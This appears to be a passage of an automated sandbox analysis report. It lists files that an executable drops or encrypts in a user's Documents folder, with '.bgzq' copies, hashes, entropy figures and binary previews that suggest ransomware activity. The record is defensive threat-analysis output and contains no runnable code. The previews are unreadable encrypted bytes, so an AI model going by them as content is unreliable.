                                                                                                Preview:EEGWX.4...W.O.....>.T...X...........U......}r.:.i.\...m70....ua.U.b..`.GAZ.0....,c.g...'@s.)....}...5.,..56e<..>.PpSb2.y.~..uL~....3.X..I....@R...O.....Y./......L...:..........(V\...D..>.~..Z.!.>.../.9 .p..q...`.7..|.....dRm#=.V.O..p%.e.x.Ik.g..,..P.7..eR...@,....PRc..0rY...A(e.v.U...m...3..g.....nZ.!...\.....R};...[./..Pn.2].....8.*.%U......L..RWW.....i. ....GH....ADG8Qmj...@-.......I.g...%S.....1....D7.Ge>.........[L.g[......0....*.Y......R..1...c%<......8g(..\7..B......".Oy.$T..}..........l/.U......Xd.\.~u=....8..@cw%.0..3C..U{p#..g..U+.Y.....gy.....f....!5.*..jw.Uc...e.,.D.@_]3.4<..s...T.E.m..J.h..~.....,...Bp#..v\.:..k....z.7...#....<.*...>..6h...?%...'M.<.G!....1i.N....H.J{!..!.q..f..<b4SX....?`.`WB.d'...T.....+o.&..E./..L......../0.....P!y[.@........D|3w.....n..ltC.....O7b....Z1HF._....R.x&.9....*.h4l.(..@.!.z.........H....@.......,..3@a.$.].E.C.X.go2Rz.%...k.N..4A...#.*....S?(5..e.}vA?...JNh....v...QB....;.s;..

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\EEGWXUHVUG.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.853707764519911
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QHCVuCfCUNb2g9aLeZXC5Sc3AVeBjW1YFRI3H7JCwwS5KxHk+jSIMUoQv3cgaRap:OCYbIb2SGCUFTLFiJCwwE9Q/cgmaofz6
                                                                                                MD5:BDEF2F909B6E57BB64BF9C908BC93FF7
                                                                                                SHA1:015780D4D10458EA24EC2E90C3117419F0B5AC16
                                                                                                SHA-256:F81626C5E0CFE25D01707FCB43917EFE98AEA65CEC0759537984E041C837E231
                                                                                                SHA-512:77265F512E36993A8EAE3D7452F2DB83FA7E8E2EB66E132D5E04D0B7929FCD9DC7797040F0629958F91E5711C7D3238EE62046B03B611755E7545B4570C1C643
                                                                                                Malicious:false
                                                                                                Preview:EEGWX.4...W.O.....>.T...X...........U......}r.:.i.\...m70....ua.U.b..`.GAZ.0....,c.g...'@s.)....}...5.,..56e<..>.PpSb2.y.~..uL~....3.X..I....@R...O.....Y./......L...:..........(V\...D..>.~..Z.!.>.../.9 .p..q...`.7..|.....dRm#=.V.O..p%.e.x.Ik.g..,..P.7..eR...@,....PRc..0rY...A(e.v.U...m...3..g.....nZ.!...\.....R};...[./..Pn.2].....8.*.%U......L..RWW.....i. ....GH....ADG8Qmj...@-.......I.g...%S.....1....D7.Ge>.........[L.g[......0....*.Y......R..1...c%<......8g(..\7..B......".Oy.$T..}..........l/.U......Xd.\.~u=....8..@cw%.0..3C..U{p#..g..U+.Y.....gy.....f....!5.*..jw.Uc...e.,.D.@_]3.4<..s...T.E.m..J.h..~.....,...Bp#..v\.:..k....z.7...#....<.*...>..6h...?%...'M.<.G!....1i.N....H.J{!..!.q..f..<b4SX....?`.`WB.d'...T.....+o.&..E./..L......../0.....P!y[.@........D|3w.....n..ltC.....O7b....Z1HF._....R.x&.9....*.h4l.(..@.!.z.........H....@.......,..3@a.$.].E.C.X.go2Rz.%...k.N..4A...#.*....S?(5..e.}vA?...JNh....v...QB....;.s;..

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.871689346832565
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wT2GGaj5z/7WvCeQsjqnSIa9DpHGnaQ/2sICtT83CcLNZXfzIbD:wyGGc/OCJpSIalZ5Gr3czfzSD
                                                                                                MD5:E17ECA4A3A93B8A0B0F3F4D37D44A696
                                                                                                SHA1:E6D78C52BF4D8BF83081EFE5E4C3CAF0648EAC6E
                                                                                                SHA-256:5F44DE4512A0D4D931F7AC1010EAD532D2BFDA11EEB02E49E371DC3F820BA9D1
                                                                                                SHA-512:2B17CE4241F75BDE77232A1A7A32D22D43149761A3134C8E6B36B3B836DF3B130E3C63764BB44CC9953C5A9F7EE0A8C959C240EAD03DD080928F9C8566F69268
                                                                                                Malicious:false
                                                                                                Preview:EFOYF....e.c.......e...........l|Ee.x.g...X...}.....`.0.HB.wS.$.......vr...M.n.>.S..F.... .Qc..Q...nr.......*...K0n".....F...i.....w8..9....B..7.+1-....'..if.<P.../..I.I..}....]$...(...91...(.>.*.\ ..../..n........ro..J...nb.8k..k.62.F3...OX.`..+....qUz.:6m..3k........s&.G.....E...P.b6..{..N.%.b..,..s..oh.8=`..r.;..t.l.O....].ZA....U..>.j..8Z..g....n...;....#].U..=i...uiL.....2.x!.B..PZ...Lsl.o~.)...h.H..B.!.....`..A..C@...;.{...F.+.:...<~qc[....w'.dK..8...]..U....1.T.d]..&s...C..e....$"\...j...[.../.M.Lq.,3....|N.....I._ZA.^b.....0. .3&.H.3..r.>!.'i..{......~z,...a).Cbo.;.w*.4a...!..J-.....p.............|n....w.h....7......3..*.y$T\*.-........E@.DqH.L........[o....![......+..:+.e..i.7tV.:.zV........;....r..,6h.<H.-.p..............]..j.F.->q..r..2.C.....}.w\.K`./..>|.N...o.#[H....'......I4.c.X..,.I.(2.....-..%....l.+..p\.m...l..p.b0.l.EDO...y..d..s...).*.g..v6.>..8C..i...<^.........4.I{.....u....Pn...ZHX.....m....K=.t.V.u........

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.871689346832565
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wT2GGaj5z/7WvCeQsjqnSIa9DpHGnaQ/2sICtT83CcLNZXfzIbD:wyGGc/OCJpSIalZ5Gr3czfzSD
                                                                                                MD5:E17ECA4A3A93B8A0B0F3F4D37D44A696
                                                                                                SHA1:E6D78C52BF4D8BF83081EFE5E4C3CAF0648EAC6E
                                                                                                SHA-256:5F44DE4512A0D4D931F7AC1010EAD532D2BFDA11EEB02E49E371DC3F820BA9D1
                                                                                                SHA-512:2B17CE4241F75BDE77232A1A7A32D22D43149761A3134C8E6B36B3B836DF3B130E3C63764BB44CC9953C5A9F7EE0A8C959C240EAD03DD080928F9C8566F69268
                                                                                                Malicious:false
                                                                                                Preview:EFOYF....e.c.......e...........l|Ee.x.g...X...}.....`.0.HB.wS.$.......vr...M.n.>.S..F.... .Qc..Q...nr.......*...K0n".....F...i.....w8..9....B..7.+1-....'..if.<P.../..I.I..}....]$...(...91...(.>.*.\ ..../..n........ro..J...nb.8k..k.62.F3...OX.`..+....qUz.:6m..3k........s&.G.....E...P.b6..{..N.%.b..,..s..oh.8=`..r.;..t.l.O....].ZA....U..>.j..8Z..g....n...;....#].U..=i...uiL.....2.x!.B..PZ...Lsl.o~.)...h.H..B.!.....`..A..C@...;.{...F.+.:...<~qc[....w'.dK..8...]..U....1.T.d]..&s...C..e....$"\...j...[.../.M.Lq.,3....|N.....I._ZA.^b.....0. .3&.H.3..r.>!.'i..{......~z,...a).Cbo.;.w*.4a...!..J-.....p.............|n....w.h....7......3..*.y$T\*.-........E@.DqH.L........[o....![......+..:+.e..i.7tV.:.zV........;....r..,6h.<H.-.p..............]..j.F.->q..r..2.C.....}.w\.K`./..>|.N...o.#[H....'......I4.c.X..,.I.(2.....-..%....l.+..p\.m...l..p.b0.l.EDO...y..d..s...).*.g..v6.>..8C..i...<^.........4.I{.....u....Pn...ZHX.....m....K=.t.V.u........

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\GRXZDKKVDB.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.866915286018362
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:q/DwHWCwHxyqurKJj1EvAKcYQGfdd6tu3U6Vk2iwZqVYPIbwv94WmCrEaA3XfzIX:qLTRquuvAOQGatu3UAiLVYQbw14WmE1F
                                                                                                MD5:C58883CD62701596F18F8459913B348A
                                                                                                SHA1:72AEBB5CB05CF08767498352D573BA111F03E55B
                                                                                                SHA-256:8814200BC4CFA03C27AAAA92BF8AABC94D5E6B1F009492005186E8EC5FB3A79E
                                                                                                SHA-512:2FCCBE0F5C764622A752B058882F73ED821075BFA7F5D0B75A021DC35CC1DE59BB26BF78D4B74445597BB38B5CFA4861B24446DFD899725270372611B8FFAF9C
                                                                                                Malicious:false
                                                                                                Preview:GRXZD=......T....O/.....G.]....R}.P.?...\.L......0.tx2...j.d...'mZ.....74.8k.d.):ah...!-d$...Y.....-'.}J...FA(...j)"].G.O.s+.....N...%5F:2.b"|i9.o....P...1.qH..oal.*..I-..$...$.&v..1.o..l/...C.. xU#..UX..........F.{.H.I....q...W}.-zg.>97..W....[....vC.%y........f...D.X~..2.l......Y...\L.....Kr.Jp.hw>....;C_Y+...xx3....qy..2....j..%.wT..T.Or.).T.....4.x..N...!b..g_Y..d.....;:..#.............D\...Q......R@..1.j.d....H.:.........&.u.V3.1y.GA&..4m..;k..Ef@....../<.V...uP..=.q.$...@Z.L.~..6xW{`.80..I........T*.[..a...r.. ...b.Q.....r.2......@b5iY.....S.h'9j.AR.Q..T.v..E.>$.._.i.....Q...89..t.|.3....H..Y:.!*t3.+G.....z.'..DA.o=..3E.u. ...L....(,....C..!.Gr..)...J-...9 .;.... .#...-.+.M.q..w..mG.^.F....v. .).....X...p...%\.....h..qqq1*.R4.:.....a,I:...hu.u?#.....JV....._.?..f'......`X.....*...:.x&.K..h^~.....d..h.i...*...D..o'.e......t..s..9D.7...Y.........)..>..........6.O8...c.....@5uc....3.qm..m,.J.xp@............[.4h..?!k......0...z8h..;

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\GRXZDKKVDB.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.866915286018362
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:q/DwHWCwHxyqurKJj1EvAKcYQGfdd6tu3U6Vk2iwZqVYPIbwv94WmCrEaA3XfzIX:qLTRquuvAOQGatu3UAiLVYQbw14WmE1F
                                                                                                MD5:C58883CD62701596F18F8459913B348A
                                                                                                SHA1:72AEBB5CB05CF08767498352D573BA111F03E55B
                                                                                                SHA-256:8814200BC4CFA03C27AAAA92BF8AABC94D5E6B1F009492005186E8EC5FB3A79E
                                                                                                SHA-512:2FCCBE0F5C764622A752B058882F73ED821075BFA7F5D0B75A021DC35CC1DE59BB26BF78D4B74445597BB38B5CFA4861B24446DFD899725270372611B8FFAF9C
                                                                                                Malicious:false
                                                                                                Preview:GRXZD=......T....O/.....G.]....R}.P.?...\.L......0.tx2...j.d...'mZ.....74.8k.d.):ah...!-d$...Y.....-'.}J...FA(...j)"].G.O.s+.....N...%5F:2.b"|i9.o....P...1.qH..oal.*..I-..$...$.&v..1.o..l/...C.. xU#..UX..........F.{.H.I....q...W}.-zg.>97..W....[....vC.%y........f...D.X~..2.l......Y...\L.....Kr.Jp.hw>....;C_Y+...xx3....qy..2....j..%.wT..T.Or.).T.....4.x..N...!b..g_Y..d.....;:..#.............D\...Q......R@..1.j.d....H.:.........&.u.V3.1y.GA&..4m..;k..Ef@....../<.V...uP..=.q.$...@Z.L.~..6xW{`.80..I........T*.[..a...r.. ...b.Q.....r.2......@b5iY.....S.h'9j.AR.Q..T.v..E.>$.._.i.....Q...89..t.|.3....H..Y:.!*t3.+G.....z.'..DA.o=..3E.u. ...L....(,....C..!.Gr..)...J-...9 .;.... .#...-.+.M.q..w..mG.^.F....v. .).....X...p...%\.....h..qqq1*.R4.:.....a,I:...hu.u?#.....JV....._.?..f'......`X.....*...:.x&.K..h^~.....d..h.i...*...D..o'.e......t..s..9D.7...Y.........)..>..........6.O8...c.....@5uc....3.qm..m,.J.xp@............[.4h..?!k......0...z8h..;

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\NVWZAPQSQL.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858850921793598
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FXtdsNuFwGAgKbkhVP0sU+mls6jy/XthOHZDpP8c5wBBx+JtQ2kAdRuIqS4n985c:FXtdsygbkTP0yuchOHZDV5w1+/AAdRuj
                                                                                                MD5:6B623AFFF4221A4C43AE0EFAE40B9B95
                                                                                                SHA1:EDCF05E089173DC691A39820E01FEE426F3C1D14
                                                                                                SHA-256:59ED914F09717C6190C9CFDC2C81D4CAA6B643FE676588C0DB437A7A874BCDAC
                                                                                                SHA-512:1BC1145F8C6F79A2E00872D486280961B3B3B55B6049B7D3329ACF0CE5A184E09C41AD867C7B5781A8D57550291601F7CB7CE5F4899C0AA1E6DA7C46BA99A9DC
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.\-u.U...g6....@....V4.t+.z.....I.f79...p...F......M...T.k...u..z8.6.J.=...D..t...i.....L..[C...E.w..K......0;|c.....n.c...vz.$E...g1...S0[sB....-\.1..A.NAF........=Xz...$.r3.`bZ..z.V....X...:U..*.6.`.1......6Y.o.Pi(L.........Y.<.k$.....<.].'..q..,........p....k.fb....:.L....Y...soi+_[......tgS=P....v[a~r!.o.N..7yK.>w3..;.w.{._.........H.{..6.)w.h.....'t..5U...N..S.o....b...L;i..n......|..Xp....Ri....3.f....F.a.Im#.T~N..(..u.iWy+m.....(..).h.4.IO..]ox.ZPG..V.xO....i.B.% ..[.h.{.=..T..29d.3.....p.S...P.SI c..X.N.k.U=...9.y...A....Q"....`......_:..7Q....qS....d....N.P|6..9a.k.....0.Y.8......8c..>....@.....Dqdh{2..?.;;...y.Y.+.?.&w...l.`.}8wq.uR.O......*q9j.wH.D..R,....O.........&k.;V..:...T.}.%.?......lN...B6I..'.6.......U..E...*TJ.Y...g......z.l.......X..5,.Y...=.U..b.W.....p.iUAw...k0.5'e.>.......~..J.....c.A`n.Y..[.-.W. .K).s..U....].d<.a.8.j.~%_.z.!....._.H..........|.Yx..J3....t.~......B..~.p2.~.n../P.Tm.. ..oa6.....H\

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\NVWZAPQSQL.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858850921793598
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FXtdsNuFwGAgKbkhVP0sU+mls6jy/XthOHZDpP8c5wBBx+JtQ2kAdRuIqS4n985c:FXtdsygbkTP0yuchOHZDV5w1+/AAdRuj
                                                                                                MD5:6B623AFFF4221A4C43AE0EFAE40B9B95
                                                                                                SHA1:EDCF05E089173DC691A39820E01FEE426F3C1D14
                                                                                                SHA-256:59ED914F09717C6190C9CFDC2C81D4CAA6B643FE676588C0DB437A7A874BCDAC
                                                                                                SHA-512:1BC1145F8C6F79A2E00872D486280961B3B3B55B6049B7D3329ACF0CE5A184E09C41AD867C7B5781A8D57550291601F7CB7CE5F4899C0AA1E6DA7C46BA99A9DC
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.\-u.U...g6....@....V4.t+.z.....I.f79...p...F......M...T.k...u..z8.6.J.=...D..t...i.....L..[C...E.w..K......0;|c.....n.c...vz.$E...g1...S0[sB....-\.1..A.NAF........=Xz...$.r3.`bZ..z.V....X...:U..*.6.`.1......6Y.o.Pi(L.........Y.<.k$.....<.].'..q..,........p....k.fb....:.L....Y...soi+_[......tgS=P....v[a~r!.o.N..7yK.>w3..;.w.{._.........H.{..6.)w.h.....'t..5U...N..S.o....b...L;i..n......|..Xp....Ri....3.f....F.a.Im#.T~N..(..u.iWy+m.....(..).h.4.IO..]ox.ZPG..V.xO....i.B.% ..[.h.{.=..T..29d.3.....p.S...P.SI c..X.N.k.U=...9.y...A....Q"....`......_:..7Q....qS....d....N.P|6..9a.k.....0.Y.8......8c..>....@.....Dqdh{2..?.;;...y.Y.+.?.&w...l.`.}8wq.uR.O......*q9j.wH.D..R,....O.........&k.;V..:...T.}.%.?......lN...B6I..'.6.......U..E...*TJ.Y...g......z.l.......X..5,.Y...=.U..b.W.....p.iUAw...k0.5'e.>.......~..J.....c.A`n.Y..[.-.W. .K).s..U....].d<.a.8.j.~%_.z.!....._.H..........|.Yx..J3....t.~......B..~.p2.~.n../P.Tm.. ..oa6.....H\

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\SQSJKEBWDT.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.877138023066246
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:PvpSIJElkbcq+C7cPyMvCm+uATP8wjCjZqkyIOUh0k4dR2rBZXfzIbD:PvkkEWcKQ1+b8wO1q0O24TGBpfzSD
                                                                                                MD5:89354AA40B6BD7C041BFFAB12AFAC1E0
                                                                                                SHA1:73995D3B4C4D920F2773AC448D283B4B9733886B
                                                                                                SHA-256:B51B06B3820443E5F56E69DB0CD0DD68107223F4FCA54CE494F2825C54624B4D
                                                                                                SHA-512:CDB41C5BE5F6E84F7DE4CD1520DA29BCF39B9047A7B863B243470159B1789D6FD677C916A72185001DC289DDFA5D76D4C4762902B7071BC5FB7FFF8FAAB60FA4
                                                                                                Malicious:false
                                                                                                Preview:SQSJK'.H.{..k........5...z..N>>......-.*.N`...J.+..q.Wy..W.T..:.Xf.....>c.WNE....y.J.s`...Xux.Y...............G@/'.......z...O_....?..o.b......8.F.......].. ..%L:.&B...I..V..........?.;8.. .B-.p..a.q .\.F(.g.S";.f.m...c....=.|.......fg...P.....Q#.Zj..*jV.c...f.M....Tp.eZ.....QW.+.....m4.9t%.........K...8..~.......].a.m...GF.>..)s....l.2.....Q..&lZ....8m.......iS....+...V2^>.m..K}.?.{.?.......Mb..B~......t.P....em......7p..==...qe8u.v...W.......,.[.p%.<(k..GM.LSu.....0z.HmO.,.N..p...!..AP.P[0...8.M'...%E..}&:T...... 'M.8!.k..O.w..*.jy.#{.......^&=o.A*..fl.m.;.../..e.,$.vW....]G......T.7.T.._Kz.E. ..p.>x.;..3..q[..q.~..v2..I{.L4..':..1....!.-o'q...;B..c.5..=.d....Ao+.d..../-..$.z....../_..;..\4.2q.U..T?...H......*...B..........c.X.[.S.w.Mu..n...].p....@.:c.D....f..eQ...E.....%..o.<...5...'.6}W._bl!.;....8.sl.D.+M.Y..L.......(.k....W..@Q_...].vW.^.%1.Zm.d.a..^......./...,{N....^..xCnZ...3.VZh..,......$eJ....e....?..y....>....t.....S6..:....W.R+r..

                                                                                                C:\Users\user\Documents\BNAGMGSPLO\SQSJKEBWDT.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.877138023066246
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:PvpSIJElkbcq+C7cPyMvCm+uATP8wjCjZqkyIOUh0k4dR2rBZXfzIbD:PvkkEWcKQ1+b8wO1q0O24TGBpfzSD
                                                                                                MD5:89354AA40B6BD7C041BFFAB12AFAC1E0
                                                                                                SHA1:73995D3B4C4D920F2773AC448D283B4B9733886B
                                                                                                SHA-256:B51B06B3820443E5F56E69DB0CD0DD68107223F4FCA54CE494F2825C54624B4D
                                                                                                SHA-512:CDB41C5BE5F6E84F7DE4CD1520DA29BCF39B9047A7B863B243470159B1789D6FD677C916A72185001DC289DDFA5D76D4C4762902B7071BC5FB7FFF8FAAB60FA4
                                                                                                Malicious:false
                                                                                                Preview:SQSJK'.H.{..k........5...z..N>>......-.*.N`...J.+..q.Wy..W.T..:.Xf.....>c.WNE....y.J.s`...Xux.Y...............G@/'.......z...O_....?..o.b......8.F.......].. ..%L:.&B...I..V..........?.;8.. .B-.p..a.q .\.F(.g.S";.f.m...c....=.|.......fg...P.....Q#.Zj..*jV.c...f.M....Tp.eZ.....QW.+.....m4.9t%.........K...8..~.......].a.m...GF.>..)s....l.2.....Q..&lZ....8m.......iS....+...V2^>.m..K}.?.{.?.......Mb..B~......t.P....em......7p..==...qe8u.v...W.......,.[.p%.<(k..GM.LSu.....0z.HmO.,.N..p...!..AP.P[0...8.M'...%E..}&:T...... 'M.8!.k..O.w..*.jy.#{.......^&=o.A*..fl.m.;.../..e.,$.vW....]G......T.7.T.._Kz.E. ..p.>x.;..3..q[..q.~..v2..I{.L4..':..1....!.-o'q...;B..c.5..=.d....Ao+.d..../-..$.z....../_..;..\4.2q.U..T?...H......*...B..........c.X.[.S.w.Mu..n...].p....@.:c.D....f..eQ...E.....%..o.<...5...'.6}W._bl!.;....8.sl.D.+M.Y..L.......(.k....W..@Q_...].vW.^.%1.Zm.d.a..^......./...,{N....^..xCnZ...3.VZh..,......$eJ....e....?..y....>....t.....S6..:....W.R+r..

                                                                                                C:\Users\user\Documents\DUUDTUBZFW.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852884353834084
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JzrPEDHSjaPfdPpR+cGqWKyOTOslGQM5WqrGxvkKFlPA7bOxuyd3F2sYuO5XfzIX:J3Ej3PnkcMKpBlGQ4VSvkel6ixusV2sT
                                                                                                MD5:23416BB1DCF93BEFF0837B95BE91796C
                                                                                                SHA1:95F0BFD45039DED22AD45689462E03230A9044E0
                                                                                                SHA-256:2A62BD9336735899EEE135FFDB24A3F26780ED777E17E4EC6D5FEBA3886D204B
                                                                                                SHA-512:BA955DFD9D717B1C34EF5EF4D58C9B9D32F72CC0D51509D52955BDE2C3E7E22E524F247993DCFC60EA69E78965CA4ADB78A88F88709047DD5374D0F07FAB8EB2
                                                                                                Malicious:false
                                                                                                Preview:DUUDT.......6.'.......5od.."....=i...'BV.V.:...S...Z.@$.B..=......2..O...o.r.p..JI...u.(.2.J.u>...$(.....x.o.r..l.3*..QU|, .h?f.._..e\....r...:.V...o..i..../...G..!...<...nzea?.W.../1...X..2.^...xGY..G. ..l5.u...... .f<..b...N;....B.e..t.s...)U.w-Q.O~..L...J.7&....6#...D.z-.2.t.tJ..J.V..e.\_{........1.^,5...da....o.:.y8...,}.vJ..$.....h<...R,..h. ..N...2...7.L..lg./l.l|=A.R..&......Q.~.".T.k..I......^-..u.7...[.....8................X..Qbgd......d.T...../0.._{......A_6.W......km|..$`...h...z....r...Y...|...GDR....&...x......n......l..:......j..0.9b.:92N..H*...,.b..;G6. ....pV._AU"o....l.;...$..I..B*K.N -....(.O...........I.r_.a..@U...q&._........8..... l...1;.3.GU*.....=...2V]x\..z.iC..y.h..?..]..k...:..e...)....}.....2...a..........6.\92..ryX @.+.kn!..}..j...:....dP..}Qz....(....x..Az...E8>n.....q..m.'..e..^.X.>:..`H~..;..p..U..L..L.z.5..@{ `..........r.q<......P.. <$.a..h......VS.mw.:S.0e.....d...%.q.~........at...G..Fx_P....Fs.y

                                                                                                C:\Users\user\Documents\DUUDTUBZFW.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852884353834084
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JzrPEDHSjaPfdPpR+cGqWKyOTOslGQM5WqrGxvkKFlPA7bOxuyd3F2sYuO5XfzIX:J3Ej3PnkcMKpBlGQ4VSvkel6ixusV2sT
                                                                                                MD5:23416BB1DCF93BEFF0837B95BE91796C
                                                                                                SHA1:95F0BFD45039DED22AD45689462E03230A9044E0
                                                                                                SHA-256:2A62BD9336735899EEE135FFDB24A3F26780ED777E17E4EC6D5FEBA3886D204B
                                                                                                SHA-512:BA955DFD9D717B1C34EF5EF4D58C9B9D32F72CC0D51509D52955BDE2C3E7E22E524F247993DCFC60EA69E78965CA4ADB78A88F88709047DD5374D0F07FAB8EB2
                                                                                                Malicious:false
                                                                                                Preview:DUUDT.......6.'.......5od.."....=i...'BV.V.:...S...Z.@$.B..=......2..O...o.r.p..JI...u.(.2.J.u>...$(.....x.o.r..l.3*..QU|, .h?f.._..e\....r...:.V...o..i..../...G..!...<...nzea?.W.../1...X..2.^...xGY..G. ..l5.u...... .f<..b...N;....B.e..t.s...)U.w-Q.O~..L...J.7&....6#...D.z-.2.t.tJ..J.V..e.\_{........1.^,5...da....o.:.y8...,}.vJ..$.....h<...R,..h. ..N...2...7.L..lg./l.l|=A.R..&......Q.~.".T.k..I......^-..u.7...[.....8................X..Qbgd......d.T...../0.._{......A_6.W......km|..$`...h...z....r...Y...|...GDR....&...x......n......l..:......j..0.9b.:92N..H*...,.b..;G6. ....pV._AU"o....l.;...$..I..B*K.N -....(.O...........I.r_.a..@U...q&._........8..... l...1;.3.GU*.....=...2V]x\..z.iC..y.h..?..]..k...:..e...)....}.....2...a..........6.\92..ryX @.+.kn!..}..j...:....dP..}Qz....(....x..Az...E8>n.....q..m.'..e..^.X.>:..`H~..;..p..U..L..L.z.5..@{ `..........r.q<......P.. <$.a..h......VS.mw.:S.0e.....d...%.q.~........at...G..Fx_P....Fs.y

                                                                                                C:\Users\user\Documents\EEGWXUHVUG.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.840120662104634
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uMaMpji7QYUnJx5PqGuQ+mOJ7nod/xUcKU8oxwxFuj39myIxlJxBLmhEDMm5Xfz6:u5E1YUJ/iGuLxnwUcKKaij39FIv9KrYu
                                                                                                MD5:B3E057EE20E25115A1D36B9A373680CD
                                                                                                SHA1:5329FFB8B719E8CAB87CB9A891D565C1080D939F
                                                                                                SHA-256:66BF9254826BD0F51077ABC698855B7FE5A46CBE7C44580AF7C94F6248F476E5
                                                                                                SHA-512:EC587C7E4052536E6DC9D343F60203EDD756A4C0CC5C4D8CEE70C74A12F8C0130FBDA14217F46E6D04952B0AD49A27A177DF69DB1241116502B7785D443CB040
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..a.Z>..(q....X.TBJ..3:.~.*..N.q..H.....rp.\.*/..m....v.Z.}I.>..Z......7......B....y.....@Zt....zD.....+../_..}......c...t>V....w.-Z..y.}.)L...~.r....f...ta.9Oc..sv.\.J.U.R........U..s.N.4.FE....;?O....y.Wn.%....Bx.c-...x._^...)Af(..7`C.b..>S2.W.-........(...DD?Y..~R....t0..w .$.h..Q..(+.(...9X..$.WI0B^u....q....W..=_......g.h.pW.........um .../m.;..2..Z...'.+.Y.}..g3Uog.........!.....~...V.......I.#.v9...2wr..wr.P..LaO.>`$.x....Eoz..C*\.fO................F)..A".x.),...]%.9..6$@)...Z.@*.X}......C."x.......@...A..6..1v..y.y.........V........ JKp.Y.UW6..f.%..6..2..Z%..e.......8......Ggx..D.ZZh.@#j.+V.~..7....Lo..{v*...*J;..xz....(.....f*.O....:z......c.t..Z.l...3..X.e2...h..Y..-.?%.~...............+.RVa..........C.Q....%..<."........yO..y[.1[.._..yr...(.GJ.......^..?;z[.^H.b..S..c}..7G.O....d......-.<s.x.....?3AW.....#a..e....^lk.o.Mi.Qr..I.}0.`RQ.a.)....$;%RV..o4./...y.....AxE..*...........j.)|.M|..~.p.:.(.Bl..{S.#i..7?...l1...cW.....4..H.

                                                                                                C:\Users\user\Documents\EEGWXUHVUG.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.840120662104634
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uMaMpji7QYUnJx5PqGuQ+mOJ7nod/xUcKU8oxwxFuj39myIxlJxBLmhEDMm5Xfz6:u5E1YUJ/iGuLxnwUcKKaij39FIv9KrYu
